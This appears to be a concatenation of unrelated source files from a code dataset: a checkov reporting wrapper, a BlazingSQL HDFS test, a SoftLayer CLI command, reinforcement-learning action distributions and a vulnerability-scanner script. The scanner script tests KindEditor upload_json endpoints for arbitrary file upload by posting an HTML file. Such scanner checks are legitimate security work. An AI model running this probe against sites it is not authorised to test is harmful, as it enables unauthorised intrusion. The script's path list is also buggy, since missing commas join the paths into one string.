key: letterPairs.get(key, 0)
if letterPairs.get(key, 0) > globalLetterPairs.get(key, 0)
else globalLetterPairs.get(key, 0)
for key in set(letterPairs) | set(globalLetterPairs)
}
# SORTING
globalLetterPairs = sorted(
globalLetterPairs.items(), key=operator.itemgetter(1), reverse=True
)
globalLetterPairsDict = {key: value for (key, value) in globalLetterPairs}
# OUTPUT
with open("count/total/list.json", "w") as output_a, open(
"count/total/dictionary.json", "w"
) as output_b:
output_a.write(json.dumps(globalLetterPairs, indent=4, ensure_ascii=False))
output_b.write(json.dumps(globalLetterPairsDict, indent=4, ensure_ascii=False))
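# Worked example of the per-book normalization above (illustrative numbers): one "book" is
# taken as 100 pages x 3000 characters = 300,000 pairs, so a pair counted 150 times in a
# corpus with totalValue = 1,500,000 gets the clamped score
# 150 / 1500000 * 3000 * 100 = 30.0, i.e. roughly 30 expected occurrences per book.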
|
f6b4f36edc53b26864a982dbb13e74e7bfd40bb2
|
45e376ae66b78b17788b1d3575b334b2cb1d0b1c
|
/checkov/common/bridgecrew/wrapper.py
|
17dde199b96a5dd2ecba404160b7dcd7216ad2af
|
[
"Apache-2.0"
] |
permissive
|
bridgecrewio/checkov
|
aeb8febed2ed90e61d5755f8f9d80b125362644d
|
e64cbd27ffb6f09c2c9f081b45b7a821a3aa1a4d
|
refs/heads/main
| 2023-08-31T06:57:21.990147
| 2023-08-30T23:01:47
| 2023-08-30T23:01:47
| 224,386,599
| 5,929
| 1,056
|
Apache-2.0
| 2023-09-14T20:10:23
| 2019-11-27T08:55:14
|
Python
|
UTF-8
|
Python
| false
| false
| 7,646
|
py
|
wrapper.py
|
from __future__ import annotations
import logging
import os
import json
import itertools
from concurrent import futures
from io import StringIO
from typing import Any, TYPE_CHECKING
from collections import defaultdict
import dpath
from igraph import Graph
try:
from networkx import DiGraph, node_link_data
except ImportError:
logging.info("Not able to import networkx")
DiGraph = str
node_link_data = lambda G : {}
from checkov.common.bridgecrew.check_type import CheckType
from checkov.common.models.consts import SUPPORTED_FILE_EXTENSIONS
from checkov.common.typing import _ReducedScanReport
from checkov.common.util.file_utils import compress_string_io_tar
from checkov.common.util.igraph_serialization import serialize_to_json
from checkov.common.util.json_utils import CustomJSONEncoder
if TYPE_CHECKING:
from mypy_boto3_s3.client import S3Client
from checkov.common.output.report import Report
checkov_results_prefix = 'checkov_results'
check_reduced_keys = (
'check_id', 'check_result', 'resource', 'file_path',
'file_line_range', 'code_block', 'caller_file_path', 'caller_file_line_range')
secrets_check_reduced_keys = check_reduced_keys + ('validation_status',)
check_metadata_keys = ('evaluations', 'code_block', 'workflow_name', 'triggers', 'job')
def _is_scanned_file(file: str) -> bool:
file_ending = os.path.splitext(file)[1]
return file_ending in SUPPORTED_FILE_EXTENSIONS
def _put_json_object(s3_client: S3Client, json_obj: Any, bucket: str, object_path: str, log_stack_trace_on_error: bool = True) -> None:
try:
s3_client.put_object(Bucket=bucket, Key=object_path, Body=json.dumps(json_obj, cls=CustomJSONEncoder))
except Exception:
logging.error(f"failed to persist object into S3 bucket {bucket}", exc_info=log_stack_trace_on_error)
raise
def _extract_checks_metadata(report: Report, full_repo_object_key: str) -> dict[str, dict[str, Any]]:
metadata: dict[str, dict[str, Any]] = defaultdict(dict)
for check in itertools.chain(report.passed_checks, report.failed_checks, report.skipped_checks):
metadata_key = f'{check.file_path}:{check.resource}'
check_meta = {k: getattr(check, k, "") for k in check_metadata_keys}
check_meta['file_object_path'] = full_repo_object_key + check.file_path
metadata[metadata_key][check.check_id] = check_meta
return metadata
def reduce_scan_reports(scan_reports: list[Report]) -> dict[str, _ReducedScanReport]:
"""
Transform checkov reports objects into compact dictionaries
:param scan_reports: List of checkov output reports
:return: dictionary of reduced scan reports, keyed by check type
"""
reduced_scan_reports: dict[str, _ReducedScanReport] = {}
for report in scan_reports:
check_type = report.check_type
reduced_keys = secrets_check_reduced_keys if check_type == CheckType.SECRETS else check_reduced_keys
reduced_scan_reports[check_type] = \
{
"checks": {
"passed_checks": [
{k: getattr(check, k) for k in reduced_keys}
for check in report.passed_checks],
"failed_checks": [
{k: getattr(check, k) for k in reduced_keys}
for check in report.failed_checks],
"skipped_checks": [
{k: getattr(check, k) for k in reduced_keys}
for check in report.skipped_checks]
},
"image_cached_results": report.image_cached_results
}
return reduced_scan_reports
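# Illustrative shape of one entry in the returned mapping (keys mirror the dict literal
# built above; "terraform" is just an example check type):
# reduced["terraform"]["checks"]["failed_checks"] -> list of dicts holding the reduced keys
# reduced["terraform"]["image_cached_results"] -> copied verbatim from the report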
def persist_checks_results(
reduced_scan_reports: dict[str, _ReducedScanReport], s3_client: S3Client, bucket: str,
full_repo_object_key: str
) -> dict[str, str]:
"""
Save reduced scan reports into bridgecrew's platform
:return: List of checks results path of all runners
"""
checks_results_paths = {}
for check_type, reduced_report in reduced_scan_reports.items():
check_result_object_path = f'{full_repo_object_key}/{checkov_results_prefix}/{check_type}/checks_results.json'
checks_results_paths[check_type] = check_result_object_path
_put_json_object(s3_client, reduced_report, bucket, check_result_object_path)
return checks_results_paths
def persist_run_metadata(
run_metadata: dict[str, str | list[str]], s3_client: S3Client, bucket: str, full_repo_object_key: str, use_checkov_results: bool = True
) -> None:
object_path = f'{full_repo_object_key}/{checkov_results_prefix}/run_metadata.json' if use_checkov_results else f'{full_repo_object_key}/run_metadata.json'
try:
s3_client.put_object(Bucket=bucket, Key=object_path, Body=json.dumps(run_metadata, indent=2))
except Exception:
logging.error(f"failed to persist run metadata into S3 bucket {bucket}", exc_info=True)
raise
def persist_logs_stream(logs_stream: StringIO, s3_client: S3Client, bucket: str, full_repo_object_key: str) -> None:
file_io = compress_string_io_tar(logs_stream)
object_path = f'{full_repo_object_key}/logs_file.tar.gz'
try:
s3_client.put_object(Bucket=bucket, Key=object_path, Body=file_io)
except Exception:
logging.error(f"failed to persist logs stream into S3 bucket {bucket}", exc_info=True)
raise
def enrich_and_persist_checks_metadata(
scan_reports: list[Report], s3_client: S3Client, bucket: str, full_repo_object_key: str
) -> dict[str, dict[str, str]]:
"""
Save checks metadata into bridgecrew's platform
:return: dictionary mapping each check type to its checks metadata path
"""
checks_metadata_paths: dict[str, dict[str, str]] = {}
for scan_report in scan_reports:
check_type = scan_report.check_type
checks_metadata_object = _extract_checks_metadata(scan_report, full_repo_object_key)
checks_metadata_object_path = f'{full_repo_object_key}/{checkov_results_prefix}/{check_type}/checks_metadata.json'
dpath.new(checks_metadata_paths, f"{check_type}/checks_metadata_path", checks_metadata_object_path)
_put_json_object(s3_client, checks_metadata_object, bucket, checks_metadata_object_path)
return checks_metadata_paths
def persist_graphs(graphs: dict[str, DiGraph | Graph], s3_client: S3Client, bucket: str, full_repo_object_key: str,
timeout: int, absolute_root_folder: str = '') -> None:
def _upload_graph(check_type: str, graph: DiGraph | Graph, _absolute_root_folder: str = '') -> None:
if isinstance(graph, DiGraph):
json_obj = node_link_data(graph)
graph_file_name = 'graph_networkx.json'
elif isinstance(graph, Graph):
json_obj = serialize_to_json(graph, _absolute_root_folder)
graph_file_name = 'graph_igraph.json'
else:
logging.error(f"unsupported graph type '{graph.__class__.__name__}'")
return
s3_key = f'{graphs_repo_object_key}/{check_type}/{graph_file_name}'
try:
_put_json_object(s3_client, json_obj, bucket, s3_key)
except Exception:
logging.error(f'failed to upload graph from framework {check_type} to platform', exc_info=True)
graphs_repo_object_key = full_repo_object_key.replace('checkov', 'graphs')[:-4]
with futures.ThreadPoolExecutor() as executor:
futures.wait(
[executor.submit(_upload_graph, check_type, graph, absolute_root_folder) for
check_type, graph in graphs.items()],
return_when=futures.FIRST_EXCEPTION,
timeout=timeout
)
logging.info(f"Done persisting {len(graphs)} graphs")
|
f08c634d51bed7db8847810c60f908747a66c570
|
3febe9bd6d3f0240754239bca7c02720a53dbe22
|
/tests/BlazingSQLTest/EndToEndTests/oldScripts/fileSystemHdfsTest.py
|
3d7f75855f45ecc3c5fbd98bac07d813eba112f1
|
[
"Apache-2.0"
] |
permissive
|
BlazingDB/blazingsql
|
9c7b1bdad1538a4478332de57375830090069e85
|
a35643d4c983334757eee96d5b9005b8b9fbd21b
|
refs/heads/branch-21.08
| 2023-08-17T16:10:36.051621
| 2021-09-30T21:51:09
| 2021-09-30T21:51:09
| 150,149,024
| 854
| 114
|
Apache-2.0
| 2022-09-16T23:58:36
| 2018-09-24T18:25:45
|
C++
|
UTF-8
|
Python
| false
| false
| 12,469
|
py
|
fileSystemHdfsTest.py
|
import os
from blazingsql import DataType
from Configuration import Settings as Settings
from DataBase import createSchema as cs
from pynvml import nvmlInit
from Runner import runTest
from Utils import Execution, gpuMemory, init_context, skip_test, startHadoop
queryType = "Hdfs FileSystem"
def main(dask_client, drill, dir_data_lc, bc, nRals):
start_mem = gpuMemory.capture_gpu_memory_usage()
def executionTest():
# Read Data TPCH------------------------------------------------------
authority = "hdfsdisk"
ktoken = "../KrbHDFS/myconf/krb5cc_0"
krbticket = os.path.abspath(ktoken)
hdfs_host = "172.22.0.3"
hdfs_port = 9000
hdfs_driver = "libhdfs"
print("Using krb ticket: " + krbticket)
result, error_msg, fs = bc.hdfs(
authority,
host=hdfs_host,
port=hdfs_port,
user="jhs",
driver=hdfs_driver,
kerb_ticket=krbticket,
)
if result is False:
msg = (
"""WARNING: Could not connect to HDFS instance %s:%d using
driver %s, error was: %s"""
% (hdfs_host, hdfs_port, hdfs_driver, error_msg)
)
print(msg)
print("WARNING: Will ignore " + queryType)
return
print("Success connection to HDFS:")
print(fs)
hdfs_dir_data_lc = "hdfs://" + authority + dir_data_lc
print("TPCH files at: " + hdfs_dir_data_lc)
tables = ["nation", "region", "supplier", "customer",
"lineitem", "orders"]
# TODO parquet json
data_types = [DataType.CSV, DataType.ORC, DataType.PARQUET]
for fileSchemaType in data_types:
if skip_test(dask_client, nRals, fileSchemaType, queryType):
continue
cs.create_tables(bc, hdfs_dir_data_lc, fileSchemaType,
tables=tables)
# Run Query -----------------------------------------------------
# Parameter to indicate if its necessary to order
# the resulsets before compare them
worder = 1
use_percentage = False
acceptable_difference = 0.01
print("==============================")
print(queryType)
print("==============================")
queryId = "TEST_01"
query = """select count(c_custkey) as c1, count(c_acctbal) as c2
from customer"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
queryId = "TEST_02"
query = """select count(n_nationkey), count(n_regionkey)
from nation"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
queryId = "TEST_03"
query = """select count(s_suppkey), count(s_nationkey)
from supplier"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
queryId = "TEST_04"
query = """select count(c_custkey), sum(c_acctbal),
sum(c_acctbal)/count(c_acctbal),
min(c_custkey), max(c_nationkey),
(max(c_nationkey) + min(c_nationkey))/2 c_nationkey
from customer where c_custkey < 100
group by c_nationkey"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
0.01,
True,
fileSchemaType,
) # TODO: Change sum/count for avg KC
queryId = "TEST_05"
query = """select c.c_custkey, c.c_nationkey, n.n_regionkey
from customer as c inner join nation as n
on c.c_nationkey = n.n_nationkey
where n.n_regionkey = 1 and c.c_custkey < 50"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
queryId = "TEST_06"
query = """select c_custkey, c_nationkey, c_acctbal
from customer order by c_nationkey, c_custkey, c_acctbal"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
0,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
queryId = "TEST_07"
query = """select c_custkey + c_nationkey, c_acctbal
from customer order by 1, 2"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
0,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
queryId = "TEST_08"
query = """select n1.n_nationkey as supp_nation,
n2.n_nationkey as cust_nation,
l.l_extendedprice * l.l_discount
from supplier as s
inner join lineitem as l on s.s_suppkey = l.l_suppkey
inner join orders as o on o.o_orderkey = l.l_orderkey
inner join customer as c on c.c_custkey = o.o_custkey
inner join nation as n1 on s.s_nationkey = n1.n_nationkey
inner join nation as n2 on c.c_nationkey = n2.n_nationkey
where n1.n_nationkey = 1
and n2.n_nationkey = 2 and o.o_orderkey < 10000"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
queryId = "TEST_09"
query = """select c_custkey, c_nationkey as nkey
from customer where c_custkey < 0 and c_nationkey >= 30"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
queryId = "TEST_10"
query = """select sin(c_acctbal), cos(c_acctbal),
asin(c_acctbal), acos(c_acctbal),
ln(c_acctbal), tan(c_acctbal),
atan(c_acctbal), floor(c_acctbal), c_acctbal
from customer"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
0.01,
use_percentage,
fileSchemaType,
)
queryId = "TEST_11"
query = """select n1.n_nationkey as n1key,
n2.n_nationkey as n2key,
n1.n_nationkey + n2.n_nationkey
from nation as n1
full outer join nation as n2
on n1.n_nationkey = n2.n_nationkey + 6
where n1.n_nationkey < 10
and n1.n_nationkey > 5"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
queryId = "TEST_12"
query = """select count(n1.n_nationkey) as n1key,
count(n2.n_nationkey) as n2key, count(*) as cstar
from nation as n1
full outer join nation as n2
on n1.n_nationkey = n2.n_nationkey + 6"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
queryId = "TEST_13"
query = """select o_orderkey, o_custkey
from orders where o_orderkey < 10 and o_orderkey >= 1"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
queryId = "TEST_14"
query = """select 100168549 - sum(o_orderkey)/count(o_orderkey),
56410984/sum(o_totalprice),
(123 - 945/max(o_orderkey)) /
(sum(81619/o_orderkey)/count(81619/o_orderkey))
from orders where o_orderkey < 50"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
0.01,
True,
fileSchemaType,
) # TODO: Change sum/count for avg KC
queryId = "TEST_15"
query = """select EXTRACT(YEAR FROM l_receiptdate) -
EXTRACT(YEAR FROM l_shipdate) as years_late,
EXTRACT(MONTH FROM l_receiptdate) -
EXTRACT(MONTH FROM l_shipdate) as months_late,
EXTRACT(DAY FROM l_receiptdate) -
EXTRACT(DAY FROM l_shipdate) as days_late
from lineitem
where l_shipdate < DATE '1993-01-01'"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
executionTest()
end_mem = gpuMemory.capture_gpu_memory_usage()
gpuMemory.log_memory_usage(queryType, start_mem, end_mem)
if __name__ == "__main__":
Execution.getArgs()
nvmlInit()
compare_results = True
if "compare_results" in Settings.data["RunSettings"]:
compare_results = Settings.data["RunSettings"]["compare_results"]
drill = None
if compare_results:
# Create Table Drill ------------------------------------------------
from pydrill.client import PyDrill
drill = PyDrill(host="localhost", port=8047)
cs.init_drill_schema(drill,
Settings.data["TestSettings"]["dataDirectory"])
startHadoop.start_hdfs()
# Create Context For BlazingSQL
bc, dask_client = init_context()
nRals = Settings.data["RunSettings"]["nRals"]
main(dask_client, drill, Settings.data["TestSettings"]["dataDirectory"],
bc, nRals)
startHadoop.stop_hdfs()
runTest.save_log()
gpuMemory.print_log_gpu_memory()
|
0f5e939ff6715bcbee3b4ef4dd34438bb8f7492e
|
4d3a077a439df835ce475efe7824ef6d3046b81c
|
/script/vul/kindeditor/upload_json.py
|
30a178c2aec06064d74f96d46588b1e30b906062
|
[] |
no_license
|
orleven/Tentacle
|
f00bc62278e462a3be4bfc4378f34c95d5419617
|
0b364caa7272030e03b876caf71bc9026e3ba57a
|
refs/heads/master
| 2023-09-01T11:07:33.020640
| 2023-08-22T03:37:35
| 2023-08-22T03:37:35
| 85,373,049
| 383
| 129
| null | 2023-08-21T09:26:03
| 2017-03-18T03:27:59
|
Python
|
UTF-8
|
Python
| false
| false
| 1,816
|
py
|
upload_json.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @author: orleven
import json
from aiohttp import FormData
from lib.util.aiohttputil import ClientSession
from lib.core.enums import ServicePortMap
from script import BaseScript
class Script(BaseScript):
def __init__(self):
BaseScript.__init__(self)
self.service_type = ServicePortMap.WEB
self.poc_list = [
"kindeditor/php/upload_json.php?dir=file"
"kindeditor/jsp/upload_json.jsp?dir=file"
"kindeditor/asp/upload_json.asp?dir=file"
"kindeditor/jspx/upload_json.jspx?dir=file"
"kindeditor/aspx/upload_json.aspx?dir=file"
]
async def prove(self):
if self.base_url:
async with ClientSession() as session:
for path in self.get_url_normpath_list(self.url):
if path[-1] == '/':
for poc in self.poc_list:
url = path + poc
data = FormData()
data.add_field('imgFile',
"this is a test for you. ",
filename='mytestforyou.html',
content_type='text/plain')
async with session.post(url=url, data=data) as res:
if res!=None:
text = await res.text()
try:
res = json.loads(text)
if 'url'in res.keys() and 'kindeditor' in res['url']:
yield url
except:
pass
|
a49882ae0f469751c6b50f9caef43dc0c279c632
|
636849fc7edd9dcb095cf3410a121ab37de69f02
|
/SoftLayer/CLI/virt/capacity/create.py
|
76b6a1d23556339ee2b6141ff3118d6beefe2a16
|
[
"MIT"
] |
permissive
|
softlayer/softlayer-python
|
bcb09306c3367fdbd2f1407f770c4959729b074c
|
5798373055d9f34dfd531d81638a64d0a7901a13
|
refs/heads/master
| 2023-08-23T19:32:36.990701
| 2023-08-21T03:29:44
| 2023-08-21T03:29:44
| 622,291
| 126
| 182
|
MIT
| 2023-09-14T15:04:48
| 2010-04-21T20:36:31
|
Python
|
UTF-8
|
Python
| false
| false
| 2,258
|
py
|
create.py
|
"""Create a Reserved Capacity instance."""
import click
from SoftLayer.CLI.command import SLCommand as SLCommand
from SoftLayer.CLI import environment
from SoftLayer.CLI import formatting
from SoftLayer.managers.vs_capacity import CapacityManager as CapacityManager
@click.command(cls=SLCommand)
@click.option('--name', '-n', required=True, prompt=True,
help="Name for your new reserved capacity")
@click.option('--backend_router_id', '-b', required=True, prompt=True, type=int,
help="backendRouterId, create-options has a list of valid ids to use.")
@click.option('--flavor', '-f', required=True, prompt=True,
help="Capacity keyname (C1_2X2_1_YEAR_TERM for example).")
@click.option('--instances', '-i', required=True, prompt=True, type=int,
help="Number of VSI instances this capacity reservation can support.")
@click.option('--test', is_flag=True,
help="Do not actually create the virtual server")
@environment.pass_env
def cli(env, name, backend_router_id, flavor, instances, test=False):
"""Create a Reserved Capacity instance.
[red underline]*WARNING*[/]
[red]Reserved Capacity is on a yearly contract and not cancelable until the contract is expired.[/]
"""
manager = CapacityManager(env.client)
result = manager.create(
name=name,
backend_router_id=backend_router_id,
flavor=flavor,
instances=instances,
test=test)
if test:
table = formatting.Table(['Name', 'Value'], "Test Order")
container = result['orderContainers'][0]
table.add_row(['Name', container['name']])
table.add_row(['Location', container['locationObject']['longName']])
for price in container['prices']:
table.add_row(['Contract', price['item']['description']])
table.add_row(['Hourly Total', result['postTaxRecurring']])
else:
table = formatting.Table(['Name', 'Value'], "Reciept")
table.add_row(['Order Date', result['orderDate']])
table.add_row(['Order ID', result['orderId']])
table.add_row(['status', result['placedOrder']['status']])
table.add_row(['Hourly Total', result['orderDetails']['postTaxRecurring']])
env.fout(table)
|
b0453fd48629469bb1e4fed67d8ff279266ee8bf
|
9edbe7b1ec03b557aa8f5b8fc6b7623bdb9151b3
|
/sample_factory/algo/utils/action_distributions.py
|
083b8504e7d4c512707b033ed52654ccfa74e20f
|
[
"MIT"
] |
permissive
|
alex-petrenko/sample-factory
|
77c0370ef73902c5530acec7cb49cc1eff224173
|
7e1e69550f4de4cdc003d8db5bb39e186803aee9
|
refs/heads/master
| 2023-07-24T17:27:10.924055
| 2023-06-30T12:09:31
| 2023-06-30T12:09:31
| 192,824,415
| 644
| 99
|
MIT
| 2023-07-17T08:50:05
| 2019-06-20T00:59:01
|
Python
|
UTF-8
|
Python
| false
| false
| 10,777
|
py
|
action_distributions.py
|
import math
import gymnasium as gym
import numpy as np
import torch
from torch import Tensor
from torch.distributions import Independent, Normal
from torch.nn import functional
from sample_factory.utils.typing import ActionSpace
from sample_factory.utils.utils import log
def calc_num_actions(action_space):
if isinstance(action_space, gym.spaces.Discrete):
return 1
elif isinstance(action_space, gym.spaces.Tuple):
return sum([calc_num_actions(a) for a in action_space])
elif isinstance(action_space, gym.spaces.Box):
if len(action_space.shape) != 1:
raise Exception("Non-trivial shape Box action spaces not currently supported. Try to flatten the space.")
return action_space.shape[0]
else:
raise NotImplementedError(f"Action space type {type(action_space)} not supported!")
def calc_num_action_parameters(action_space: ActionSpace) -> int:
"""Returns the number of paramaters required to represent the given action space."""
if isinstance(action_space, gym.spaces.Discrete):
return action_space.n
elif isinstance(action_space, gym.spaces.Tuple):
return sum([calc_num_action_parameters(a) for a in action_space])
elif isinstance(action_space, gym.spaces.Box):
# one mean and one standard deviation for every action
return np.prod(action_space.shape) * 2
else:
raise NotImplementedError(f"Action space type {type(action_space)} not supported!")
def is_continuous_action_space(action_space: ActionSpace) -> bool:
return isinstance(action_space, gym.spaces.Box)
def get_action_distribution(action_space, raw_logits):
"""
Create the distribution object based on provided action space and unprocessed logits.
:param action_space: Gym action space object
:param raw_logits: this function expects unprocessed raw logits (not after log-softmax!)
:return: action distribution that you can sample from
"""
assert calc_num_action_parameters(action_space) == raw_logits.shape[-1]
if isinstance(action_space, gym.spaces.Discrete):
return CategoricalActionDistribution(raw_logits)
elif isinstance(action_space, gym.spaces.Tuple):
return TupleActionDistribution(action_space, logits_flat=raw_logits)
elif isinstance(action_space, gym.spaces.Box):
return ContinuousActionDistribution(params=raw_logits)
else:
raise NotImplementedError(f"Action space type {type(action_space)} not supported!")
def sample_actions_log_probs(distribution):
if isinstance(distribution, TupleActionDistribution):
return distribution.sample_actions_log_probs()
else:
actions = distribution.sample()
log_prob_actions = distribution.log_prob(actions)
return actions, log_prob_actions
def argmax_actions(distribution):
if isinstance(distribution, TupleActionDistribution):
return distribution.argmax()
elif hasattr(distribution, "probs"):
return torch.argmax(distribution.probs, dim=-1)
elif hasattr(distribution, "means"):
return distribution.means
else:
raise NotImplementedError(f"Action distribution type {type(distribution)} does not support argmax!")
# noinspection PyAbstractClass
class CategoricalActionDistribution:
def __init__(self, raw_logits):
"""
Ctor.
:param raw_logits: unprocessed logits, typically an output of a fully-connected layer
"""
self.raw_logits = raw_logits
self.log_p = self.p = None
@property
def probs(self):
if self.p is None:
self.p = functional.softmax(self.raw_logits, dim=-1)
return self.p
@property
def log_probs(self):
if self.log_p is None:
self.log_p = functional.log_softmax(self.raw_logits, dim=-1)
return self.log_p
def sample_gumbel(self):
sample = torch.argmax(self.raw_logits - torch.empty_like(self.raw_logits).exponential_().log_(), -1)
return sample
def sample(self):
samples = torch.multinomial(self.probs, 1, True)
return samples
def log_prob(self, value):
value = value.long()
log_probs = torch.gather(self.log_probs, -1, value).view(-1)
return log_probs
def entropy(self):
p_log_p = self.log_probs * self.probs
return -p_log_p.sum(-1)
def _kl(self, other_log_probs):
probs, log_probs = self.probs, self.log_probs
kl = probs * (log_probs - other_log_probs)
kl = kl.sum(dim=-1)
return kl
def _kl_inverse(self, other_log_probs):
kl = torch.exp(other_log_probs) * (other_log_probs - self.log_probs)
kl = kl.sum(dim=-1)
return kl
def _kl_symmetric(self, other_log_probs):
return 0.5 * (self._kl(other_log_probs) + self._kl_inverse(other_log_probs))
def symmetric_kl_with_uniform_prior(self):
probs, log_probs = self.probs, self.log_probs
num_categories = log_probs.shape[-1]
uniform_prob = 1 / num_categories
log_uniform_prob = math.log(uniform_prob)
return 0.5 * (
(probs * (log_probs - log_uniform_prob)).sum(dim=-1)
+ (uniform_prob * (log_uniform_prob - log_probs)).sum(dim=-1)
)
def kl_divergence(self, other):
return self._kl(other.log_probs)
def dbg_print(self):
dbg_info = dict(
entropy=self.entropy().mean(),
min_logit=self.raw_logits.min(),
max_logit=self.raw_logits.max(),
min_prob=self.probs.min(),
max_prob=self.probs.max(),
)
msg = ""
for key, value in dbg_info.items():
msg += f"{key}={value.cpu().item():.3f} "
log.debug(msg)
class TupleActionDistribution:
"""
Basically, a tuple of independent action distributions.
Useful when the environment requires multiple independent action heads, e.g.:
- moving in the environment
- selecting a weapon
- jumping
- strafing
Empirically, it seems to be better to represent such an action distribution as a tuple of independent action
distributions, rather than a one-hot over potentially big cartesian product of all action spaces, like it's
usually done in Atari.
Entropy of such a distribution is just a sum of entropies of individual distributions.
"""
def __init__(self, action_space, logits_flat):
self.logit_lengths = [calc_num_action_parameters(s) for s in action_space.spaces]
self.split_logits = torch.split(logits_flat, self.logit_lengths, dim=1)
self.action_lengths = [calc_num_actions(s) for s in action_space.spaces]
assert len(self.split_logits) == len(action_space.spaces)
self.distributions = []
for i, space in enumerate(action_space.spaces):
self.distributions.append(get_action_distribution(space, self.split_logits[i]))
@staticmethod
def _flatten_actions(list_of_action_batches):
batch_of_action_tuples = torch.cat(list_of_action_batches, 1)
return batch_of_action_tuples
def _calc_log_probs(self, list_of_action_batches):
# calculate batched log probs for every distribution
log_probs = [d.log_prob(a) for d, a in zip(self.distributions, list_of_action_batches)]
log_probs = [lp.unsqueeze(dim=1) for lp in log_probs]
# concatenate and calculate sum of individual log-probs
# this is valid under the assumption that action distributions are independent
log_probs = torch.cat(log_probs, dim=1)
log_probs = log_probs.sum(dim=1)
return log_probs
def sample_actions_log_probs(self):
list_of_action_batches = [d.sample() for d in self.distributions]
batch_of_action_tuples = self._flatten_actions(list_of_action_batches)
log_probs = self._calc_log_probs(list_of_action_batches)
return batch_of_action_tuples, log_probs
def sample(self):
list_of_action_batches = [d.sample() for d in self.distributions]
return self._flatten_actions(list_of_action_batches)
def argmax(self):
list_of_action_batches = [argmax_actions(d) for d in self.distributions]
return torch.cat(list_of_action_batches).unsqueeze(0)
def log_prob(self, actions):
# split into batches of actions from individual distributions
list_of_action_batches = torch.split(actions, self.action_lengths, dim=1)
log_probs = self._calc_log_probs(list_of_action_batches)
return log_probs
def entropy(self):
entropies = [d.entropy().unsqueeze(dim=1) for d in self.distributions]
entropies = torch.cat(entropies, dim=1)
entropy = entropies.sum(dim=1)
return entropy
def kl_divergence(self, other):
kls = [d.kl_divergence(other_d).unsqueeze(dim=1) for d, other_d in zip(self.distributions, other.distributions)]
kls = torch.cat(kls, dim=1)
kl = kls.sum(dim=1)
return kl
def symmetric_kl_with_uniform_prior(self):
sym_kls = [d.symmetric_kl_with_uniform_prior().unsqueeze(dim=1) for d in self.distributions]
sym_kls = torch.cat(sym_kls, dim=1)
sym_kl = sym_kls.sum(dim=1)
return sym_kl
def dbg_print(self):
for d in self.distributions:
d.dbg_print()
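# Minimal usage sketch (hypothetical; assumes the calc_* helpers and get_action_distribution
# defined elsewhere in this module, and a gym.spaces.Tuple of two Discrete spaces):
#   action_space = gym.spaces.Tuple([gym.spaces.Discrete(3), gym.spaces.Discrete(2)])
#   logits = torch.randn(4, 5)  # batch of 4; 3 + 2 = 5 logits in total
#   dist = TupleActionDistribution(action_space, logits_flat=logits)
#   actions, log_probs = dist.sample_actions_log_probs()  # actions: [4, 2], log_probs: [4]
#   entropy = dist.entropy()  # sum of the two per-head entropies, shape [4]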
# noinspection PyAbstractClass
class ContinuousActionDistribution(Independent):
stddev_min: float = 1e-4
stddev_max: float = 1e4
def __init__(self, params):
self.means, self.log_std, self.stddevs = self._init_impl(params, self.stddev_min, self.stddev_max)
normal_dist = Normal(self.means, self.stddevs, validate_args=False)
super().__init__(normal_dist, 1, validate_args=False)
@staticmethod
@torch.jit.script
def _init_impl(params: Tensor, stddev_min: float, stddev_max: float):
# using torch.chunk here is slightly faster than plain indexing
means, log_std = torch.chunk(params, 2, dim=1)
stddevs = log_std.exp()
stddevs = torch.clamp(stddevs, stddev_min, stddev_max)
return means, log_std, stddevs
def kl_divergence(self, other):
kl = torch.distributions.kl.kl_divergence(self, other)
return kl
def summaries(self):
return dict(
action_mean=self.means.mean(),
action_mean_min=self.means.min(),
action_mean_max=self.means.max(),
action_log_std_mean=self.log_std.mean(),
action_log_std_min=self.log_std.min(),
action_log_std_max=self.log_std.max(),
action_stddev_mean=self.stddevs.mean(),
action_stddev_min=self.stddevs.min(),
action_stddev_max=self.stddevs.max(),
)
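# Minimal usage sketch (hypothetical): the parameter tensor stacks means and log-stddevs
# along dim=1, so a 3-dimensional action space needs 6 parameters per sample:
#   params = torch.randn(8, 6)            # batch of 8
#   dist = ContinuousActionDistribution(params)
#   actions = dist.sample()               # shape [8, 3]
#   log_prob = dist.log_prob(actions)     # shape [8]; Independent sums over the action dim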
|
1cc12d0e87500aa3f015d332ff52f94abb8c6b5e
|
2c4c3f777d94157d5a5cf8664907de1a605a1110
|
/algorithms/GraphSage/metrics.py
|
c69630695a33d269be435e654279cf4a27904f14
|
[
"Apache-2.0"
] |
permissive
|
safe-graph/DGFraud
|
a86715662d86291c22dae389aa36d72b74042ab6
|
22b72d75f81dd057762f0c7225a4558a25095b8f
|
refs/heads/master
| 2023-08-23T01:01:04.195966
| 2022-04-20T21:39:08
| 2022-04-20T21:39:08
| 223,415,751
| 632
| 162
|
Apache-2.0
| 2020-07-31T04:10:54
| 2019-11-22T14:02:36
|
Python
|
UTF-8
|
Python
| false
| false
| 1,481
|
py
|
